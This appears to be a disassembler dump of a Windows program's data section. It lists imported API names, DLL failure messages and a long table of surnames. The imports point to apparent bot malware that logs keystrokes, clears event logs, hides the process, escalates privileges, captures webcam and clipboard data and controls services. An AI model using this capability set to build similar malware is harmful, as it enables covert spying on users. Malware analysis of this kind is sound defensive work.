aSelect db 'select',0 ; DATA XREF: sub_409909+631�o
align 4
aBind db 'bind',0 ; DATA XREF: sub_409909+629�o
align 4
aRecvfrom db 'recvfrom',0 ; DATA XREF: sub_409909+617�o
align 4
aRecv db 'recv',0 ; DATA XREF: sub_409909+60A�o
align 10h
aSendto db 'sendto',0 ; DATA XREF: sub_409909+5FD�o
align 4
aNtohl db 'ntohl',0 ; DATA XREF: sub_409909+5E3�o
align 10h
aNtohs db 'ntohs',0 ; DATA XREF: sub_409909+5D6�o
align 4
aHtonl db 'htonl',0 ; DATA XREF: sub_409909+5C9�o
align 10h
aHtons db 'htons',0 ; DATA XREF: sub_409909+5BC�o
align 4
aInet_addr db 'inet_addr',0 ; DATA XREF: sub_409909+5AF�o
align 4
aInet_ntoa db 'inet_ntoa',0 ; DATA XREF: sub_409909+5A2�o
align 10h
aConnect db 'connect',0 ; DATA XREF: sub_409909+595�o
aIoctlsocket db 'ioctlsocket',0 ; DATA XREF: sub_409909+588�o
aSocket db 'socket',0 ; DATA XREF: sub_409909+57B�o
align 4
aWsacleanup db 'WSACleanup',0 ; DATA XREF: sub_409909+56E�o
align 4
aWsagetlasterro db 'WSAGetLastError',0 ; DATA XREF: sub_409909+561�o
aWsaioctl db 'WSAIoctl',0 ; DATA XREF: sub_409909+554�o
align 4
a__wsafdisset db '__WSAFDIsSet',0 ; DATA XREF: sub_409909+547�o
align 4
aWsaasyncselect db 'WSAAsyncSelect',0 ; DATA XREF: sub_409909+53A�o
align 4
aWsasocketa db 'WSASocketA',0 ; DATA XREF: sub_409909+52D�o
align 10h
aWsastartup db 'WSAStartup',0 ; DATA XREF: sub_409909+525�o
align 4
aWs2_32_dll db 'ws2_32.dll',0 ; DATA XREF: sub_409909+514�o
align 4
aDeleteobject db 'DeleteObject',0 ; DATA XREF: sub_409909+4A1�o
align 4
aDeletedc db 'DeleteDC',0 ; DATA XREF: sub_409909+494�o
align 4
aBitblt db 'BitBlt',0 ; DATA XREF: sub_409909+487�o
align 4
aSelectobject db 'SelectObject',0 ; DATA XREF: sub_409909+47A�o
align 4
aGetdibcolortab db 'GetDIBColorTable',0 ; DATA XREF: sub_409909+46D�o
align 10h
aGetdevicecaps db 'GetDeviceCaps',0 ; DATA XREF: sub_409909+460�o
align 10h
aCreatecompatib db 'CreateCompatibleDC',0 ; DATA XREF: sub_409909+453�o
align 4
aCreatedibsecti db 'CreateDIBSection',0 ; DATA XREF: sub_409909+446�o
align 4
aCreatedca db 'CreateDCA',0 ; DATA XREF: sub_409909+43E�o
align 4
aGdi32_dll db 'gdi32.dll',0 ; DATA XREF: sub_409909:loc_409D36�o
align 10h
aGetusernamea db 'GetUserNameA',0 ; DATA XREF: sub_409909:loc_409D0E�o
align 10h
aIsvalidsecurit db 'IsValidSecurityDescriptor',0 ; DATA XREF: sub_409909+3AD�o
align 4
aEnumservicesst db 'EnumServicesStatusA',0 ; DATA XREF: sub_409909+3A0�o
aCloseserviceha db 'CloseServiceHandle',0 ; DATA XREF: sub_409909+393�o
align 4
aDeleteservice db 'DeleteService',0 ; DATA XREF: sub_409909+386�o
align 4
aControlservice db 'ControlService',0 ; DATA XREF: sub_409909+379�o
align 4
aStartservicea db 'StartServiceA',0 ; DATA XREF: sub_409909+36C�o
align 4
aOpenservicea db 'OpenServiceA',0 ; DATA XREF: sub_409909+35F�o
align 4
aOpenscmanagera db 'OpenSCManagerA',0 ; DATA XREF: sub_409909:loc_409C60�o
align 4
aAdjusttokenpri db 'AdjustTokenPrivileges',0 ; DATA XREF: sub_409909+327�o
align 4
aLookupprivileg db 'LookupPrivilegeValueA',0 ; DATA XREF: sub_409909+31A�o
align 4
aOpenprocesstok db 'OpenProcessToken',0 ; DATA XREF: sub_409909:loc_409C1B�o
align 4
aCleareventloga db 'ClearEventLogA',0 ; DATA XREF: sub_409909+2C6�o
align 4
aOpeneventloga db 'OpenEventLogA',0 ; DATA XREF: sub_409909+2B9�o
align 4
aRegclosekey db 'RegCloseKey',0 ; DATA XREF: sub_409909+2AC�o
aRegdeletevalue db 'RegDeleteValueA',0 ; DATA XREF: sub_409909+29F�o
aRegqueryvaluee db 'RegQueryValueExA',0 ; DATA XREF: sub_409909+292�o
align 4
aRegsetvalueexa db 'RegSetValueExA',0 ; DATA XREF: sub_409909+285�o
align 4
aRegcreatekeyex db 'RegCreateKeyExA',0 ; DATA XREF: sub_409909+278�o
aRegopenkeyexa db 'RegOpenKeyExA',0 ; DATA XREF: sub_409909+270�o
align 4
aAdvapi32_dll db 'advapi32.dll',0 ; DATA XREF: sub_409909:loc_409B68�o
align 4
aGetforegroundw db 'GetForegroundWindow',0 ; DATA XREF: sub_409909+21A�o
aGetwindowtexta db 'GetWindowTextA',0 ; DATA XREF: sub_409909+20D�o
align 4
aGetkeystate db 'GetKeyState',0 ; DATA XREF: sub_409909+200�o
aGetasynckeysta db 'GetAsyncKeyState',0 ; DATA XREF: sub_409909:loc_409B01�o
align 4
aExitwindowsex db 'ExitWindowsEx',0 ; DATA XREF: sub_409909+1A0�o
align 4
aCloseclipboard db 'CloseClipboard',0 ; DATA XREF: sub_409909+193�o
align 4
aGetclipboardda db 'GetClipboardData',0 ; DATA XREF: sub_409909+186�o
align 10h
aOpenclipboard db 'OpenClipboard',0 ; DATA XREF: sub_409909+179�o
align 10h
aDestroywindow db 'DestroyWindow',0 ; DATA XREF: sub_409909+16C�o
align 10h
aIswindow db 'IsWindow',0 ; DATA XREF: sub_409909+15F�o
align 4
aFindwindowa db 'FindWindowA',0 ; DATA XREF: sub_409909+152�o
aSendmessagea db 'SendMessageA',0 ; DATA XREF: sub_409909+14A�o
align 4
aUser32_dll db 'user32.dll',0 ; DATA XREF: sub_409909:loc_409A3E�o
; sub_425029+D�o
align 4
aRegisterservic db 'RegisterServiceProcess',0 ; DATA XREF: sub_409909:loc_409A11�o
align 4
aQueryperform_0 db 'QueryPerformanceFrequency',0 ; DATA XREF: sub_409909+A0�o
align 4
aQueryperforman db 'QueryPerformanceCounter',0 ; DATA XREF: sub_409909+93�o
aSearchpatha db 'SearchPathA',0 ; DATA XREF: sub_409909+86�o
aGetdrivetypea db 'GetDriveTypeA',0 ; DATA XREF: sub_409909+79�o
align 4
aGetlogicaldriv db 'GetLogicalDriveStringsA',0 ; DATA XREF: sub_409909+6C�o
aGetdiskfreespa db 'GetDiskFreeSpaceExA',0 ; DATA XREF: sub_409909+5F�o
aModule32first db 'Module32First',0 ; DATA XREF: sub_409909+52�o
align 4
aProcess32next db 'Process32Next',0 ; DATA XREF: sub_409909+45�o
align 4
aProcess32first db 'Process32First',0 ; DATA XREF: sub_409909+38�o
align 4
aCreatetoolhelp db 'CreateToolhelp32Snapshot',0 ; DATA XREF: sub_409909+2B�o
align 4
aSeterrormode db 'SetErrorMode',0 ; DATA XREF: sub_409909+23�o
align 4
aKernel32_dll db 'kernel32.dll',0 ; DATA XREF: sub_409909+A�o
align 4
unk_42D6C4 db 2Dh ; - ; DATA XREF: sub_40A5C5+2F2�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aDllTestComplet db 'DLL test complete.',0
align 4
aAvicap32_dllFa db 'Avicap32.dll failed. <%d>',0 ; DATA XREF: sub_40A5C5+2CC�o
align 10h
aOdbc32_dllFail db 'Odbc32.dll failed. <%d>',0 ; DATA XREF: sub_40A5C5+298�o
aShell32_dllFai db 'Shell32.dll failed. <%d>',0 ; DATA XREF: sub_40A5C5+264�o
align 4
aMpr32_dllFaile db 'Mpr32.dll failed. <%d>',0 ; DATA XREF: sub_40A5C5+230�o
align 4
aIphlpapi_dllFa db 'Iphlpapi.dll failed. <%d>',0 ; DATA XREF: sub_40A5C5+1FC�o
align 4
aDnsapi_dllFail db 'Dnsapi.dll failed. <%d>',0 ; DATA XREF: sub_40A5C5+1C8�o
aNetapi32_dllFa db 'Netapi32.dll failed. <%d>',0 ; DATA XREF: sub_40A5C5+194�o
align 4
aIcmp_dllFailed db 'Icmp.dll failed. <%d>',0 ; DATA XREF: sub_40A5C5+160�o
align 4
aWininet_dllFai db 'Wininet.dll failed. <%d>',0 ; DATA XREF: sub_40A5C5+12C�o
align 10h
aWs2_32_dllFail db 'Ws2_32.dll failed. <%d>',0 ; DATA XREF: sub_40A5C5+F8�o
aGdi32_dllFaile db 'Gdi32.dll failed. <%d>',0 ; DATA XREF: sub_40A5C5+C4�o
align 10h
aAdvapi32_dllFa db 'Advapi32.dll failed. <%d>',0 ; DATA XREF: sub_40A5C5+90�o
align 4
aUser32_dllFail db 'User32.dll failed. <%d>',0 ; DATA XREF: sub_40A5C5+5C�o
aKernel32_dllFa db 'Kernel32.dll failed. <%d>',0 ; DATA XREF: sub_40A5C5+28�o
align 10h
a__0: ; DATA XREF: sub_41036B+252�o
unicode 0, <.>,0
unk_42D854 db 2Dh ; - ; DATA XREF: sub_40A928:loc_40A9E7�o
db 3, 34h, 2
db 66h ; f
db 6Ch, 75h, 73h
db 68h ; h
db 64h, 6Eh, 73h
db 2
db 3, 2Dh, 20h
aNotSupportedBy db 'not supported by this system',0
align 4
unk_42D884 db 2Dh ; - ; DATA XREF: sub_40A928:loc_40A9B5�o
db 3, 34h, 2
db 66h ; f
db 6Ch, 75h, 73h
db 68h ; h
db 64h, 6Eh, 73h
db 2
db 3, 2Dh, 20h
aUnableToAlloca db 'unable to allocate ARP cache',0
align 4
unk_42D8B4 db 2Dh ; - ; DATA XREF: sub_40A928:loc_40A981�o
db 3, 34h, 2
db 66h ; f
db 6Ch, 75h, 73h
db 68h ; h
db 64h, 6Eh, 73h
db 2
db 3, 2Dh, 20h
aArpCacheIsEmpt db 'ARP cache is empty',0
align 4
unk_42D8D8 db 2Dh ; - ; DATA XREF: sub_40A928+49�o
db 3, 34h, 2
db 66h ; f
db 6Ch, 75h, 73h
db 68h ; h
db 64h, 6Eh, 73h
db 2
db 3, 2Dh, 20h
aErrorGettingAr db 'error getting ARP cache: %d',0
aD_D_D_D db '%d.%d.%d.%d',0 ; DATA XREF: sub_40AA06+46�o
; sub_40C2AF+38�o ...
aReal db 'real',0
align 4
dd 0
dword_42D91C dd 0 ; DATA XREF: sub_40AE84+7�o
off_42D920 dd offset sub_40AAAC ; DATA XREF: sub_40AE84+49�r
aConst db 'const',0
align 10h
dd 1, 40AB19h, 7474656Ch, 7265h, 0
dd 2, 40AB77h, 706D6F63h, 2 dup(0)
dd 3, 40ABC4h, 6E756F63h, 797274h, 0
dd 4, 40AC62h, 736Fh, 2 dup(0)
dd 5, 40ACD7h, 6E6C6C61h, 6B6369h, 0
dd 6, 40AEEDh
off_42D99C dd offset aAbdulrazak ; DATA XREF: sub_40AAAC+21�r
; "Abdulrazak"
dd offset aAckerman ; "Ackerman"
dd offset aAdams ; "Adams"
off_42D9A8 dd offset aAddison ; DATA XREF: sub_40AE84+39�o
; "Addison"
dd offset aAdelstein ; "Adelstein"
dd offset aAdibe ; "Adibe"
dd offset aAdorno ; "Adorno"
dd offset aAhlers ; "Ahlers"
dd offset aAlavi ; "Alavi"
dd offset aAlcorn ; "Alcorn"
dd offset aAlda ; "Alda"
dd offset aAleks ; "Aleks"
dd offset aAllison ; "Allison"
dd offset aAlongi ; "Alongi"
dd offset aAltavilla ; "Altavilla"
dd offset aAltenberger ; "Altenberger"
dd offset aAltenhofen ; "Altenhofen"
dd offset aAmaral ; "Amaral"
dd offset aAmatangelo ; "Amatangelo"
dd offset aAmeer ; "Ameer"
dd offset aAmsden ; "Amsden"
dd offset aAnand ; "Anand"
dd offset aAndel ; "Andel"
dd offset aAndo ; "Ando"
dd offset aAndrelus ; "Andrelus"
dd offset aAndron ; "Andron"
dd offset aAnfinrud ; "Anfinrud"
dd offset aAnsley ; "Ansley"
dd offset aAnthony ; "Anthony"
dd offset aAntos ; "Antos"
dd offset aArbia ; "Arbia"
dd offset aArduini ; "Arduini"
dd offset aArellano ; "Arellano"
dd offset aAristotle ; "Aristotle"
dd offset aArjas ; "Arjas"
dd offset aArky ; "Arky"
dd offset aAtkins ; "Atkins"
dd offset aAugustus ; "Augustus"
dd offset aAurelius ; "Aurelius"
dd offset aAxelrod ; "Axelrod"
dd offset aAxworthy ; "Axworthy"
dd offset aAyiemba ; "Ayiemba"
dd offset aAykroyd ; "Aykroyd"
dd offset aAyling ; "Ayling"
dd offset aAzima ; "Azima"
dd offset aBachmuth ; "Bachmuth"
dd offset aBackus ; "Backus"
dd offset aBady ; "Bady"
dd offset aBaglivo ; "Baglivo"
dd offset aBagnold ; "Bagnold"
dd offset aBailar ; "Bailar"
dd offset aBakanowsky ; "Bakanowsky"
dd offset aBaleja ; "Baleja"
dd offset aBallatori ; "Ballatori"
dd offset aBallew ; "Ballew"
dd offset aBaltz ; "Baltz"
dd offset aBanta ; "Banta"
dd offset aBarabesi ; "Barabesi"
dd offset aBarajas ; "Barajas"
dd offset aBaranczak ; "Baranczak"
dd offset aBaranowska ; "Baranowska"
dd offset aBarberi ; "Barberi"
dd offset aBarbetti ; "Barbetti"
dd offset aBarneson ; "Barneson"
dd offset aBarnett ; "Barnett"
dd offset aBarriola ; "Barriola"
dd offset aBarry ; "Barry"
dd offset aBartholomew ; "Bartholomew"
dd offset aBartolome ; "Bartolome"
dd offset aBartoo ; "Bartoo"
dd offset aBasavappa ; "Basavappa"
dd offset aBashevis ; "Bashevis"
dd offset aBatchelder ; "Batchelder"
dd offset aBaumiller ; "Baumiller"
dd offset aBayles ; "Bayles"
dd offset aBayo ; "Bayo"
dd offset aBeacon ; "Beacon"
dd offset aBeal ; "Beal"
dd offset aBean ; "Bean"
dd offset aBeckman ; "Beckman"
dd offset aBeder ; "Beder"
dd offset aBedford ; "Bedford"
dd offset aBehenna ; "Behenna"
dd offset aBelanger ; "Belanger"
dd offset aBelaoussof ; "Belaoussof"
dd offset aBelfer ; "Belfer"
dd offset aBelinCollart ; "Belin-Collart"
dd offset aBellavance ; "Bellavance"
dd offset aBellhouse ; "Bellhouse"
dd offset aBellini ; "Bellini"
dd offset aBelloc ; "Belloc"
dd offset aBenedictDye ; "Benedict-Dye"
dd offset aBergson ; "Bergson"
dd offset aBerkeJenkins ; "Berke-Jenkins"
dd offset aBernardo ; "Bernardo"
dd offset aBernassola ; "Bernassola"
dd offset aBernston ; "Bernston"
dd offset aBerrizbeitia ; "Berrizbeitia"
dd offset aBetti ; "Betti"
dd offset aBeynart ; "Beynart"
dd offset aBiagioli ; "Biagioli"
dd offset aBickel ; "Bickel"
dd offset aBinion ; "Binion"
dd offset aBir ; "Bir"
dd offset aBisema ; "Bisema"
dd offset aBisho ; "Bisho"
dd offset aBlackbourn ; "Blackbourn"
dd offset aBlackwell ; "Blackwell"
dd offset aBlagg ; "Blagg"
dd offset aBlakemore ; "Blakemore"
dd offset aBlanke ; "Blanke"
dd offset aBliss ; "Bliss"
dd offset aBlizard ; "Blizard"
dd offset aBloch ; "Bloch"
dd offset aBloembergen ; "Bloembergen"
dd offset aBloemhof ; "Bloemhof"
dd offset aBloxham ; "Bloxham"
dd offset aBlyth ; "Blyth"
dd offset aBolger ; "Bolger"
dd offset aBolick ; "Bolick"
dd offset aBollinger ; "Bollinger"
dd offset aBologna ; "Bologna"
dd offset aBoner ; "Boner"
dd offset aBonham ; "Bonham"
dd offset aBoniface ; "Boniface"
dd offset aBontempo ; "Bontempo"
dd offset aBook ; "Book"
dd offset aBookbinder ; "Bookbinder"
dd offset aBoone ; "Boone"
dd offset aBoorstin ; "Boorstin"
dd offset aBorack ; "Borack"
dd offset aBorden ; "Borden"
dd offset aBossi ; "Bossi"
dd offset aBothman ; "Bothman"
dd offset aBotosh ; "Botosh"
dd offset aBoudin ; "Boudin"
dd offset aBoudrot ; "Boudrot"
dd offset aBourneuf ; "Bourneuf"
dd offset aBowers ; "Bowers"
dd offset aBoxer ; "Boxer"
dd offset aBoyajian ; "Boyajian"
dd offset aBoyes ; "Boyes"
dd offset aBoyland ; "Boyland"
dd offset aBoym ; "Boym"
dd offset aBoyne ; "Boyne"
dd offset aBracalente ; "Bracalente"
dd offset aBradac ; "Bradac"
dd offset aBradach ; "Bradach"
dd offset aBrecht ; "Brecht"
dd offset aBreed ; "Breed"
dd offset aBrenan ; "Brenan"
dd offset aBrennan ; "Brennan"
dd offset aBrewer ; "Brewer"
dd offset aBrewer ; "Brewer"
dd offset aBridgeman ; "Bridgeman"
dd offset aBridges ; "Bridges"
dd offset aBrinton ; "Brinton"
dd offset aBritz ; "Britz"
dd offset aBroca ; "Broca"
dd offset aBrook ; "Brook"
dd offset aBrzycki ; "Brzycki"
dd offset aBuchan ; "Buchan"
dd offset aBudding ; "Budding"
dd offset aBullard ; "Bullard"
dd offset aBunton ; "Bunton"
dd offset aBurden ; "Burden"
dd offset aBurdzy ; "Burdzy"
dd offset aBurke ; "Burke"
dd offset aBurridge ; "Burridge"
dd offset aBusetta ; "Busetta"
dd offset aByatt ; "Byatt"
dd offset aByerly ; "Byerly"
dd offset aByrd ; "Byrd"
dd offset aCage ; "Cage"
dd offset aCalnan ; "Calnan"
dd offset aCammelli ; "Cammelli"
dd offset aCammilleri ; "Cammilleri"
dd offset aCanley ; "Canley"
dd offset aCapanni ; "Capanni"
dd offset aCaperton ; "Caperton"
dd offset aCapocaccia ; "Capocaccia"
dd offset aCapodilupo ; "Capodilupo"
dd offset aCappuccio ; "Cappuccio"
dd offset aCapursi ; "Capursi"
dd offset aCaratozzolo ; "Caratozzolo"
dd offset aCarayannopoulo ; "Carayannopoulos"
dd offset aCarlin ; "Carlin"
dd offset aCarlos ; "Carlos"
dd offset aCarlyle ; "Carlyle"
dd offset aCarmichael ; "Carmichael"
dd offset aCaroti ; "Caroti"
dd offset aCarper ; "Carper"
dd offset aCartmill ; "Cartmill"
dd offset aCascio ; "Cascio"
dd offset aCase ; "Case"
dd offset aCaspar ; "Caspar"
dd offset aCastelda ; "Castelda"
dd offset aCavanagh ; "Cavanagh"
dd offset aCavell ; "Cavell"
dd offset aCeniceros ; "Ceniceros"
dd offset aCerioli ; "Cerioli"
dd offset aChapman ; "Chapman"
dd offset aCharles ; "Charles"
dd offset aCheang ; "Cheang"
dd offset aCherry ; "Cherry"
dd offset aChervinsky ; "Chervinsky"
dd offset aChiassino ; "Chiassino"
dd offset aChien ; "Chien"
dd offset aChildress ; "Childress"
dd offset aChilds ; "Childs"
dd offset aChinipardaz ; "Chinipardaz"
dd offset aChinman ; "Chinman"
dd offset aChristenson ; "Christenson"
dd offset aChristian ; "Christian"
dd offset aChristiano ; "Christiano"
dd offset aChristie ; "Christie"
dd offset aChristopher ; "Christopher"
dd offset aChu ; "Chu"
dd offset aChupasko ; "Chupasko"
dd offset aChurch ; "Church"
dd offset aCiampaglia ; "Ciampaglia"
dd offset aCicero ; "Cicero"
dd offset aCifarelli ; "Cifarelli"
dd offset aClaffey ; "Claffey"
dd offset aClancy ; "Clancy"
dd offset aClark ; "Clark"
dd offset aClement ; "Clement"
dd offset aClifton ; "Clifton"
dd offset aClow ; "Clow"
dd offset aCoblenz ; "Coblenz"
dd offset aCoito ; "Coito"
dd offset aColdren ; "Coldren"
dd offset aColella ; "Colella"
dd offset aCollard ; "Collard"
dd offset aCollis ; "Collis"
dd offset aCompton ; "Compton"
dd offset aCompton ; "Compton"
dd offset aComstock ; "Comstock"
dd offset aConcino ; "Concino"
dd offset aCondodina ; "Condodina"
dd offset aConnors ; "Connors"
dd offset aCorey ; "Corey"
dd offset aCornish ; "Cornish"
dd offset aCosmides ; "Cosmides"
dd offset aCounter ; "Counter"
dd offset aCoutaux ; "Coutaux"
dd offset aCrawford ; "Crawford"
dd offset aCrocker ; "Crocker"
dd offset aCroshaw ; "Croshaw"
dd offset aCroxen ; "Croxen"
dd offset aCroxton ; "Croxton"
dd offset aCui ; "Cui"
dd offset aCurrier ; "Currier"
dd offset aCutler ; "Cutler"
dd offset aCvek ; "Cvek"
dd offset aCyders ; "Cyders"
dd offset aDasilva ; "daSilva"
dd offset aDaldalian ; "Daldalian"
dd offset aDaly ; "Daly"
dd offset aDAmbra ; "D'Ambra"
dd offset aDanieli ; "Danieli"
dd offset aDante ; "Dante"
dd offset aDapice ; "Dapice"
dd offset aDArcangelo ; "D'arcangelo"
dd offset aDas ; "Das"
dd offset aDasgupta ; "Dasgupta"
dd offset aDaskalu ; "Daskalu"
dd offset aDavid ; "David"
dd offset aDawkins ; "Dawkins"
dd offset aDegennaro ; "DeGennaro"
dd offset aDelapena ; "DeLaPena"
dd offset aDelEnclos ; "del'Enclos"
dd offset aDerousse ; "deRousse"
dd offset aDebroff ; "Debroff"
dd offset aDees ; "Dees"
dd offset aDefeciani ; "Defeciani"
dd offset aDelattre ; "Delattre"
dd offset aDeleonRendon ; "Deleon-Rendon"
dd offset aDelger ; "Delger"
dd offset aDellAcqua ; "Dell'acqua"
dd offset aDeming ; "Deming"
dd offset aDempster ; "Dempster"
dd offset aDemusz ; "Demusz"
dd offset aDenault ; "Denault"
dd offset aDenham ; "Denham"
dd offset aDenison ; "Denison"
dd offset aDesombre ; "Desombre"
dd offset aDeutsch ; "Deutsch"
dd offset aDFini ; "D'fini"
dd offset aDicks ; "Dicks"
dd offset aDiefenbach ; "Diefenbach"
dd offset aDifabio ; "Difabio"
dd offset aDifronzo ; "Difronzo"
dd offset aDilworth ; "Dilworth"
dd offset aDionysius ; "Dionysius"
dd offset aDirksen ; "Dirksen"
dd offset aDockery ; "Dockery"
dd offset aDoherty ; "Doherty"
dd offset aDonahue ; "Donahue"
dd offset aDonner ; "Donner"
dd offset aDoonan ; "Doonan"
dd offset aDore ; "Dore"
dd offset aDorf ; "Dorf"
dd offset aDosi ; "Dosi"
dd offset aDoty ; "Doty"
dd offset aDoug ; "Doug"
dd offset aDowsland ; "Dowsland"
dd offset aDrinker ; "Drinker"
dd offset aDSouza ; "D'souza"
dd offset aDuffin ; "Duffin"
dd offset aDurrett ; "Durrett"
dd offset aDussault ; "Dussault"
dd offset aDwyer ; "Dwyer"
dd offset aEardley ; "Eardley"
dd offset aEbeling ; "Ebeling"
dd offset aEckel ; "Eckel"
dd offset aEdley ; "Edley"
dd offset aEdner ; "Edner"
dd offset aEdward ; "Edward"
dd offset aEickenhorst ; "Eickenhorst"
dd offset aEliasson ; "Eliasson"
dd offset aElmendorf ; "Elmendorf"
dd offset aElmerick ; "Elmerick"
dd offset aElvis ; "Elvis"
dd offset aEncinas ; "Encinas"
dd offset aEnyeart ; "Enyeart"
dd offset aEppling ; "Eppling"
dd offset aErbach ; "Erbach"
dd offset aErdman ; "Erdman"
dd offset aErdos ; "Erdos"
dd offset aErez ; "Erez"
dd offset aEspinoza ; "Espinoza"
dd offset aEstes ; "Estes"
dd offset aEtter ; "Etter"
dd offset aEuripides ; "Euripides"
dd offset aEverett ; "Everett"
dd offset aFabbris ; "Fabbris"
dd offset aFagan ; "Fagan"
dd offset aFaioes ; "Faioes"
dd offset aFalcoAcosta ; "Falco-Acosta"
dd offset aFalorsi ; "Falorsi"
dd offset aFaris ; "Faris"
dd offset aFarone ; "Farone"
dd offset aFarren ; "Farren"
dd offset aFasso ; "Fasso'"
dd offset aFates ; "Fates"
dd offset aFeigenbaum ; "Feigenbaum"
dd offset aFejzo ; "Fejzo"
dd offset aFeldman ; "Feldman"
dd offset aFernald ; "Fernald"
dd offset aFernandes ; "Fernandes"
dd offset aFerrante ; "Ferrante"
dd offset aFerriell ; "Ferriell"
dd offset aFeuer ; "Feuer"
dd offset aFido ; "Fido"
dd offset aField ; "Field"
dd offset aFink ; "Fink"
dd offset aFinkelstein ; "Finkelstein"
dd offset aFinnegan ; "Finnegan"
dd offset aFiorina ; "Fiorina"
dd offset aFisk ; "Fisk"
dd offset aFitzmaurice ; "Fitzmaurice"
dd offset aFlier ; "Flier"
dd offset aFlores ; "Flores"
dd offset aFolks ; "Folks"
dd offset aForester ; "Forester"
dd offset aFortes ; "Fortes"
dd offset aFortier ; "Fortier"
dd offset aFossey ; "Fossey"
dd offset aFossi ; "Fossi"
dd offset aFrancisco ; "Francisco"
dd offset aFranklinKenea ; "Franklin-Kenea"
dd offset aFranz ; "Franz"
dd offset aFrazierDavis ; "Frazier-Davis"
dd offset aFreid ; "Freid"
dd offset aFreundlich ; "Freundlich"
dd offset aFried ; "Fried"
dd offset aFriedland ; "Friedland"
dd offset aFrisken ; "Frisken"
dd offset aFrowiss ; "Frowiss"
dd offset aFryberger ; "Fryberger"
dd offset aFrye ; "Frye"
dd offset aFujiiAbe ; "Fujii-Abe"
dd offset aFuller ; "Fuller"
dd offset aFurth ; "Furth"
dd offset aFusaro ; "Fusaro"
dd offset aGabrielli ; "Gabrielli"
dd offset aGaggiotti ; "Gaggiotti"
dd offset aGaleotti ; "Galeotti"
dd offset aGalwey ; "Galwey"
dd offset aGambini ; "Gambini"
dd offset aGarfield ; "Garfield"
dd offset aGarman ; "Garman"
dd offset aGaronna ; "Garonna"
dd offset aGeller ; "Geller"
dd offset aGemberling ; "Gemberling"
dd offset aGeorgi ; "Georgi"
dd offset aGerrett ; "Gerrett"
dd offset aGhorai ; "Ghorai"
dd offset aGibbens ; "Gibbens"
dd offset aGibson ; "Gibson"
dd offset aGilbert ; "Gilbert"
dd offset aGili ; "Gili"
dd offset aGill ; "Gill"
dd offset aGillispie ; "Gillispie"
dd offset aGist ; "Gist"
dd offset aGleason ; "Gleason"
dd offset aGlegg ; "Glegg"
dd offset aGlendon ; "Glendon"
dd offset aGoldfarb ; "Goldfarb"
dd offset aGoncalves ; "Goncalves"
dd offset aGood ; "Good"
dd offset aGoodearl ; "Goodearl"
dd offset aGoody ; "Goody"
dd offset aGozzi ; "Gozzi"
dd offset aGravell ; "Gravell"
dd offset aGreenberg ; "Greenberg"
dd offset aGreenfeld ; "Greenfeld"
dd offset aGriffiths ; "Griffiths"
dd offset aGrigoletto ; "Grigoletto"
dd offset aGrummell ; "Grummell"
dd offset aGruner ; "Gruner"
dd offset aGruppe ; "Gruppe"
dd offset aGuenthart ; "Guenthart"
dd offset aGunn ; "Gunn"
dd offset aGuo ; "Guo"
dd offset aHa ; "Ha"
dd offset aHaar ; "Haar"
dd offset aHackman ; "Hackman"
dd offset aHackshaw ; "Hackshaw"
dd offset aHaley ; "Haley"
dd offset aHalkias ; "Halkias"
dd offset aHallowell ; "Hallowell"
dd offset aHalpert ; "Halpert"
dd offset aHambarzumjan ; "Hambarzumjan"
dd offset aHamer ; "Hamer"
dd offset aHammerness ; "Hammerness"
dd offset aHand ; "Hand"
dd offset aHanssen ; "Hanssen"
dd offset aHarding ; "Harding"
dd offset aHargraves ; "Hargraves"
dd offset aHarlow ; "Harlow"
dd offset aHarrigan ; "Harrigan"
dd offset aHartman ; "Hartman"
dd offset aHartmann ; "Hartmann"
dd offset aHartnett ; "Hartnett"
dd offset aHarwell ; "Harwell"
dd offset aHaviaras ; "Haviaras"
dd offset aHawkes ; "Hawkes"
dd offset aHayes ; "Hayes"
dd offset aHaynes ; "Haynes"
dd offset aHazlewood ; "Hazlewood"
dd offset aHeermans ; "Heermans"
dd offset aHeft ; "Heft"
dd offset aHeiland ; "Heiland"
dd offset aHellman ; "Hellman"
dd offset aHellmiss ; "Hellmiss"
dd offset aHelprin ; "Helprin"
dd offset aHemphill ; "Hemphill"
dd offset aHenery ; "Henery"
dd offset aHenrichs ; "Henrichs"
dd offset aHernandez ; "Hernandez"
dd offset aHerrera ; "Herrera"
dd offset aHester ; "Hester"
dd offset aHeubert ; "Heubert"
dd offset aHeyeck ; "Heyeck"
dd offset aHimmelfarb ; "Himmelfarb"
dd offset aHind ; "Hind"
dd offset aHirst ; "Hirst"
dd offset aHitchcock ; "Hitchcock"
dd offset aHoang ; "Hoang"
dd offset aHock ; "Hock"
dd offset aHoffer ; "Hoffer"
dd offset aHoffman ; "Hoffman"
dd offset aHokanson ; "Hokanson"
dd offset aHokoda ; "Hokoda"
dd offset aHolmes ; "Holmes"
dd offset aHoloien ; "Holoien"
dd offset aHolter ; "Holter"
dd offset aHolway ; "Holway"
dd offset aHolzman ; "Holzman"
dd offset aHooker ; "Hooker"
dd offset aHopkins ; "Hopkins"
dd offset aHorsley ; "Horsley"
dd offset aHoshida ; "Hoshida"
dd offset aHostage ; "Hostage"
dd offset aHottle ; "Hottle"
dd offset aHoward ; "Howard"
dd offset aHoy ; "Hoy"
dd offset aHuey ; "Huey"
dd offset aHuidekoper ; "Huidekoper"
dd offset aHungerford ; "Hungerford"
dd offset aHuntington ; "Huntington"
dd offset aHupp ; "Hupp"
dd offset aHurtubise ; "Hurtubise"
dd offset aHutchings ; "Hutchings"
dd offset aHyde ; "Hyde"
dd offset aIaquinta ; "Iaquinta"
dd offset aIchikawa ; "Ichikawa"
dd offset aIgarashi ; "Igarashi"
dd offset aInamura ; "Inamura"
dd offset aInniss ; "Inniss"
dd offset aIsaac ; "Isaac"
dd offset aIsaievych ; "Isaievych"
dd offset aIsbill ; "Isbill"
dd offset aIsserman ; "Isserman"
dd offset aIyer ; "Iyer"
dd offset aJacenko ; "Jacenko"
dd offset aJackson ; "Jackson"
dd offset aJagers ; "Jagers"
dd offset aJagger ; "Jagger"
dd offset aJagoe ; "Jagoe"
dd offset aJain ; "Jain"
dd offset aJamil ; "Jamil"
dd offset aJanjigian ; "Janjigian"
dd offset aJarnagin ; "Jarnagin"
dd offset aJarrell ; "Jarrell"
dd offset aJay ; "Jay"
dd offset aJeffers ; "Jeffers"
dd offset aJellis ; "Jellis"
dd offset aJenkins ; "Jenkins"
dd offset aJespersen ; "Jespersen"
dd offset aJewett ; "Jewett"
dd offset aJohannesson ; "Johannesson"
dd offset aJohannsen ; "Johannsen"
dd offset aJohns ; "Johns"
dd offset aJolly ; "Jolly"
